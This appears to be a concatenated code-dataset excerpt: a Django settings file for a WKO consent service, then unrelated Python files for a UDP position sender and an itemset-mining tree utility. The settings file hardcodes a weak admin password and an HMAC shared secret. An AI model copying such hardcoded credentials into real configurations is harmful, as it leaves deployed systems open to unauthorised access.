ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'localhost', 'wpvconsent.vnet', 'consent.wko.at', 'consent.qss.wko.at']
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'data', 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'de-AT'
TIME_ZONE = 'Europe/Vienna'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Authentication for API user that writes consent records
BASICAUTH_USERS = {'admin': 'adminadmin'} # TODO: change weak default password
BASICAUTH_REALM: 'api_user'
# shared secret: configure same ASCII-value in proxy and consent app
PROXY_HMAC_KEY = b'leMn00UscEDWEtt/vvHs0v/+Wqjxih/WxixZOMLt'
# redirect to URL after the use accepted or declined consent
PROXY_HANDLE_CONSENT_RESPONSE_URL = 'https://satosa.vnet/simpleconsent_response'
CONSENT_BOILERPLATE_TEXT = {
'purpose': 'Der Zweck der Datenweitergabe ist die Identifikation am ausgewählten Service. '
'Wird keine Einwilligung gegeben, kann das Service, an das die Anmeldedaten übermittelt werden, '
'möglicherweise die Anmeldung ablehnen.',
'revocation': 'Die Einwilligung kann jederzeit widerrufen werden. '
'Bitte kontaktieren Sie dazu das Support Team der WKO Inhouse unter QuS@inhouse.wko.at '
'und der Angabe Ihres Namens und Ihrer Benutzerkennung. '
'Wird die Einwilligung widerrufen, erfolgt beim nächsten Login die Abfrage der Einwilligung.',
'title': 'Attributfreigabe für die Anmeldung an',
}
# ====== The configuration below should not be changed in regular deployments ======
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'consent',
#'mysql_test',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'simpleconsent.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'simpleconsent.wsgi.application'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root')
| 33.76 | 112 | 0.7 |
a02bb2a26ba4f0182baa47c6ee53f5bd76088c06 | 1,663 | py | Python | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | 1 | 2020-11-01T13:39:42.000Z | 2020-11-01T13:39:42.000Z | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | null | null | null | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | null | null | null | ## Socket to send extimated pos to srauv_main.py's internal socket
import socket
import time
import json
socket_connected = False
srauv_address = ("localhost", 7003)
last_tx_time_s = 0
socket_send_interval_s = 0.200
msg_num = -1
msg = {
"source" : "tag_detect",
"msg_num" : msg_num,
"msg_type" : "position",
"timestamp" : time.strftime("%Y-%m-%d %H:%M.%S"),
"pos_x" : -0.1,
"pos_y" : -0.2,
"pos_z" : -0.3,
"heading" : 0.4,
"tag_id" : -1
}
try:
srauv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet, udp
socket_connected = True
print(f"socket_sender forwarding to internal socket {srauv_address}")
except socket.error:
print(f"socket_sender failed to create socket {srauv_address}")
def send_over_socket(x: float, y: float, z: float, h: float, t: int):
global msg_num, last_tx_time_s
if not socket_connected or time.time() - last_tx_time_s < socket_send_interval_s:
return
msg_num += 1
last_tx_time_s = time.time()
try:
# Send position data to srauv_main
msg["pos_x"] = x
msg["pos_y"] = y
msg["pos_z"] = z
msg["heading"] = h
msg["tag_id"] = t
print(f"socket_sender tx msg:{msg}")
srauv_socket.sendto(json.dumps(msg).encode("utf-8"), srauv_address)
# Get response from srauv_main. Log it
resp, addr = srauv_socket.recvfrom(4096)
print(f"socket_sender rx utf8 resp:{resp}")
except socket.error as e:
print(f"socket_sender failed sendOverSocket {srauv_address}, err:{e}")
except Exception as ex:
print(f"socket_sender ex:{ex}")
## End socket stuff | 31.377358 | 85 | 0.644017 |
cbe6188f62a1338f017af676bc91a4fc6789a55b | 1,439 | py | Python | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | 2 | 2021-12-04T21:02:50.000Z | 2021-12-24T01:23:39.000Z | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | null | null | null | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | null | null | null | from ..utils import tree
import itertools
def compressing_itemset_tree(root, endswith):
"""
compressing itemset with tree
Parameters
----------
root : tree.Node
tree that has been fulled by itemset.
for example :
apple
// \\
banana
// \\
mango
endswith : str
compress with endswith in column.
for example :
= "mango"
Returns
-------
dictionary of itemset and counts.
for example :
{"mango": 1}
"""
return root.find_set(endswith)
def make_tree(selected_df):
"""
compressing itemset with tree
Parameters
----------
selected_df : pandas.DataFrame
dataframe that has been selected.
for example :
| apple | banana | mango |
| 1 | 0 | 0 |
| 1 | 1 | 1 |
| 1 | 0 | 1 |
Returns
-------
root for tree.
for example :
apple
// \\
banana
// \\
mango
"""
root = tree.Node(None)
for i in selected_df.index:
compressed = list(
itertools.compress(selected_df.loc[i].index, selected_df.loc[i])
)
node = tree.make_tree(compressed)
root.check_add_child(node)
return root
| 19.712329 | 76 | 0.461432 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.